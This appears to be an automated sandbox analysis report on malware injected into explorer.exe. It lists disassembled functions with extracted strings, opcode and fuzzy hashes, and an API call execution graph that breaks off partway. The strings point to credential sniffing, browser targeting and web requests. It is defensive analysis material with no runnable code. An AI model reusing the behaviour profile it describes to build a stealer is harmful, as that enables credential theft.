                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                                                              • API String ID: 0-1610437797
                                                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction ID: 582510ddc3b556fc0d31cff99ed0cccf640355029f15d91a7808daf14026eb5e
                                                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction Fuzzy Hash: 13418134258B8C8FCBA5EF2898457EAB3E4FF98341F41462E984ECB240EF30D5458782
                                                                                                                              Function 1087986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                                                              • API String ID: 0-1610437797
                                                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction ID: 47fe2925e404af39cab450d4f0a868c8eaa11acdee8c475356b62312067ce5dd
                                                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction Fuzzy Hash: 2941A23425DB4C8FCBA5EF2898457EAB7E4FB99301F41462E988EC7244EF30D9058782
                                                                                                                              Function 10A164B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                              • API String ID: 0-327345718
                                                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction ID: 5fef9a6e1722a15c541baeff15c4de33a10dbf75c73dc7761fdba88fcbda7296
                                                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction Fuzzy Hash: E5417E30A18E0D8FCB98EF6880957AD77E2FB5C350F41016EA80EDB244DA31D980CB86
                                                                                                                              Function 1087B4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                              • API String ID: 0-327345718
                                                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction ID: 3da58361aabf505a78b9add3e75c1bae3efa8fc09da17f6d753783420247f16b
                                                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction Fuzzy Hash: 3C415E30A1CE0D8FCF98EF6890957AD77E2FB68340F51466AA90ED7214DE70D9408B86
                                                                                                                              Function 10A14432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$el32$h$kern
                                                                                                                              • API String ID: 0-4264704552
                                                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction ID: 91a34de3415b891ddcc85c4f080dad5eb1f0af730ed5c7c3120272cd3c764f29
                                                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction Fuzzy Hash: 5C418270608B494FD795CF2880843AABBE1FB98340F104A2E959EC7255DF70D985CB41
                                                                                                                              Function 10879432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$el32$h$kern
                                                                                                                              • API String ID: 0-4264704552
                                                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction ID: 9ab40e6d6c8b85abdda7e9cef5e08c7d78024654019d930e73b64352e8a0b391
                                                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction Fuzzy Hash: 68418F7060CB498FD7A9CF2884843AAB7E1FB98344F108A6F949EC3265DF70D945CB81
                                                                                                                              Function 10A1B0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction ID: 5f676f183b7aa6674ccd1c9a8f0bf26dd8b97432c2a50cb57cbdced91f365d17
                                                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction Fuzzy Hash: AD31373451CB886FD71ADF28D485AEAB7D4FB94300F50491EE49BCB252EE30A54ACB43
                                                                                                                              Function 108800B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction ID: d886f3e498bf36b17bf4498a190b0b8db7894dc7ed4cfdabad9c771ef6ddaf94
                                                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction Fuzzy Hash: 8C31D07551CB88AFD76ADB28C4856DAB7D0FB84300F50491EE49BC7256EE30B54ACB43
                                                                                                                              Function 10A1B0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction ID: 0cc7ffea33ad8824210328a97774eb36370071b2a906a1d53fd478325af0ed81
                                                                                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction Fuzzy Hash: 5931017551CB486FD719DF28D485AEAB3D5FB94300F40492EE49BCB242EE30E54ACB42
                                                                                                                              Function 108800C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction ID: d34f37da601334d00050b9a0b1461aa2525d06439d4ff94e81510a3083f2f579
                                                                                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction Fuzzy Hash: 0C31EE7551CB48AFD76ADB28C485AEAB7D4FB94300F50491EF49BC3255EE30A50ACA82
                                                                                                                              Function 10A16FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction ID: 69615a4e33b888e3f88876e6f8a53104807cb8d264c94f7db05158f469ea50b3
                                                                                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction Fuzzy Hash: 75318B74118B088FC784EF289596BAAB7E1FB98200F84567DA84ECF215DF30D985C792
                                                                                                                              Function 1087BFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction ID: bfaf1daa3256cb1d8f1d5a8021322db9572e9c30bbc24cf03e114a84a2e49b7e
                                                                                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction Fuzzy Hash: FB317E7411CB488FC784EF688495BAAB7E1FF98200F84467EA44ECB219DF30D945CB96
                                                                                                                              Function 10A16FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction ID: 1d006516e93bab5d39e7690aac9b8320f8442ee684592b878dc0ea012cf321a1
                                                                                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction Fuzzy Hash: 6B31AD74118B088FC784DF289495BAAB7E1FF98300F84563DA44ACF255CF30D941C742
                                                                                                                              Function 1087BFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction ID: 6be422302a09b610c164d7c5382d9fca05496ec9430e8138196e908875c96b43
                                                                                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction Fuzzy Hash: EC317C7411CB088FC784DF6C8495BAAB7E1FF98200F84466EA44ACB259DF30D945CB96
                                                                                                                              Function 10A198C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 0-319646191
                                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction ID: 9b9291f38857baf144265da19679f1ec5fa2e5288cfabe2d255934ad1c91ac80
                                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction Fuzzy Hash: 7F31DF31614A4C8BCF44EFA8D885BEEB7E1FB58215F40022AE45EDB241DE789645C789
                                                                                                                              Function 1087E8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 0-319646191
                                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction ID: 3c9be2fd7db5ec61cf9b4839c728999ff510c57ff3d19afa8dfc3458ca1d4875
                                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction Fuzzy Hash: 4231DF31618A0D8BCF44EFA8C8857EEBBE0FB58204F40422BE44ED7240EE789645C799
                                                                                                                              Function 10A198BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 0-319646191
                                                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction ID: 319282c957b650c6e74b1cb73775f49988478ec6cdbed715473f165260a75ba1
                                                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction Fuzzy Hash: 4A210430614A4C8BCF04EFA8C985BEDBBE1FF58204F40422EE45ADB251DF749644CB89
                                                                                                                              Function 1087E8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 0-319646191
                                                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction ID: 5277b879aefcf96ede4b0eb924417d39fcbe21820ddfd50d60e97dec4fe3479d
                                                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction Fuzzy Hash: A121D031A18A4D8BCF44EFA8C8857EDBBE1FF58204F40422BE45AD7244EF749605CB99
                                                                                                                              Function 10A1AE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$l$l$t
                                                                                                                              • API String ID: 0-168566397
                                                                                                                              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                              • Instruction ID: b80995e42dd1e1f107a065247461461e7d37395d612995478e9714c5187e3fc9
                                                                                                                              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                              • Instruction Fuzzy Hash: F0218D74A24A0D9FDB48EFA8D044BADBAF1FF18314F90462EE40DD7601DB74A591CB84
                                                                                                                              Function 10A1AE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$l$l$t
                                                                                                                              • API String ID: 0-168566397
                                                                                                                              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                              • Instruction ID: 86d263d799c2001acd622b8be224ec1a70de545fd74423d16f9c42c6259bb5b0
                                                                                                                              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                              • Instruction Fuzzy Hash: BD218B74A24A0D9BDB48EFA8D045BEDBBF1FF18314F90462EE409D7601DB78A5918B84
                                                                                                                              Function 1087FE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$l$l$t
                                                                                                                              • API String ID: 0-168566397
                                                                                                                              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                              • Instruction ID: 34362e2ca24dc220b6b413f96034a7e97c8b8b4f22070204a3a4bdfb51789e20
                                                                                                                              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                              • Instruction Fuzzy Hash: BC219C74A28A0D9BDB08EFA8C0457EDBBF1FF18304F50462EE449E3600DB74A551CB94
                                                                                                                              Function 1087FE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$l$l$t
                                                                                                                              • API String ID: 0-168566397
                                                                                                                              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                              • Instruction ID: 2e374bb1eca11d9156a7aaf2d1f39502303b8e00a3435b856a62d3a47ec45a01
                                                                                                                              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                              • Instruction Fuzzy Hash: 79218D74A28B0D9FDB48EFA8C0457ADBAF1FF18304F50462EE449D3610DB74A551CB94
                                                                                                                              Function 10A1AFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: auth$logi$pass$user
                                                                                                                              • API String ID: 0-2393853802
                                                                                                                              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                              • Instruction ID: 72ece29ed676e9afe6370ed68989583058957ed141016a4abc7c45ab2e51706f
                                                                                                                              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                              • Instruction Fuzzy Hash: 9021C330614B0D8BCB45CF9998816DEB7F1EF88344F00461AE40AEB245D7B0E9548BC2
                                                                                                                              Function 1087FFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: auth$logi$pass$user
                                                                                                                              • API String ID: 0-2393853802
                                                                                                                              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                              • Instruction ID: 97890c6d3424b86d3a5913faad402c312072b6afb2659f8435ca627fa708fb0c
                                                                                                                              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                              • Instruction Fuzzy Hash: 2E21CD30618B0D8BCB45CF9D98817DEB7E1EF88344F00461AE44AEB249DBB4E9558BD2

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:621
                                                                                                                              Total number of Limit Nodes:75
                                                                                                                              execution_graph 103341 e49040 103352 e4bd00 103341->103352 103343 e4915c 103344 e4907b 103344->103343 103355 e3ace0 103344->103355 103346 e490b1 103360 e44e40 103346->103360 103348 e490e0 Sleep 103351 e490cd 103348->103351 103351->103343 103351->103348 103365 e48c60 LdrLoadDll 103351->103365 103366 e48e70 LdrLoadDll 103351->103366 103353 e4bd2d 103352->103353 103367 e4a500 LdrLoadDll 103352->103367 103353->103344 103357 e3ad04 103355->103357 103356 e3ad0b 103356->103346 103357->103356 103358 e3ad40 LdrLoadDll 103357->103358 103359 e3ad57 103357->103359 103358->103359 103359->103346 103361 e44e5a 103360->103361 103362 e44e4e 103360->103362 103361->103351 103362->103361 103368 e452c0 LdrLoadDll 103362->103368 103364 e44fac 103364->103351 103365->103351 103366->103351 103367->103353 103368->103364 103369 e4f09d 103372 e4b990 103369->103372 103373 e4b9b6 103372->103373 103380 e39d30 103373->103380 103375 e4b9c2 103376 e4b9e6 103375->103376 103388 e38f30 103375->103388 103426 e4a670 103376->103426 103381 e39d3d 103380->103381 103429 e39c80 103380->103429 103383 e39d44 103381->103383 103441 e39c20 103381->103441 103383->103375 103389 e38f57 103388->103389 103844 e3b1b0 103389->103844 103391 e38f69 103848 e3af00 103391->103848 103393 e38f86 103400 e38f8d 103393->103400 103919 e3ae30 LdrLoadDll 103393->103919 103396 e38ffc 103864 e3f400 103396->103864 103398 e39006 103399 e4bf50 2 API calls 103398->103399 103423 e390f2 103398->103423 103401 e3902a 103399->103401 103400->103423 103852 e3f370 103400->103852 103402 e4bf50 2 API calls 103401->103402 103403 e3903b 103402->103403 103404 e4bf50 2 API calls 103403->103404 103405 e3904c 103404->103405 103876 e3ca80 103405->103876 103407 e39059 103408 e44a40 8 API calls 103407->103408 103409 e39066 103408->103409 103410 e44a40 8 API calls 103409->103410 103411 e39077 103410->103411 103412 e390a5 103411->103412 103413 e39084 103411->103413 103415 e44a40 8 API calls 103412->103415 103886 e3d610 103413->103886 103422 e390c1 103415->103422 103418 e390e9 103420 e38d00 21 API calls 103418->103420 103419 e39092 103902 e38d00 103419->103902 103420->103423 103422->103418 103920 e3d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103422->103920 103423->103376 103427 e4af20 LdrLoadDll 103426->103427 103428 e4a68f 103427->103428 103460 e48b80 103429->103460 103433 e39ca6 103433->103381 103434 e39c9c 103434->103433 103467 e4b270 103434->103467 103436 e39ce3 103436->103433 103478 e39aa0 103436->103478 103438 e39d03 103484 e39620 LdrLoadDll 103438->103484 103440 e39d15 103440->103381 103823 e4b560 103441->103823 103444 e4b560 LdrLoadDll 103445 e39c4b 103444->103445 103446 e4b560 LdrLoadDll 103445->103446 103447 e39c61 103446->103447 103448 e3f170 103447->103448 103449 e3f189 103448->103449 103827 e3b030 103449->103827 103451 e3f19c 103831 e4a1a0 103451->103831 103454 e39d55 103454->103375 103456 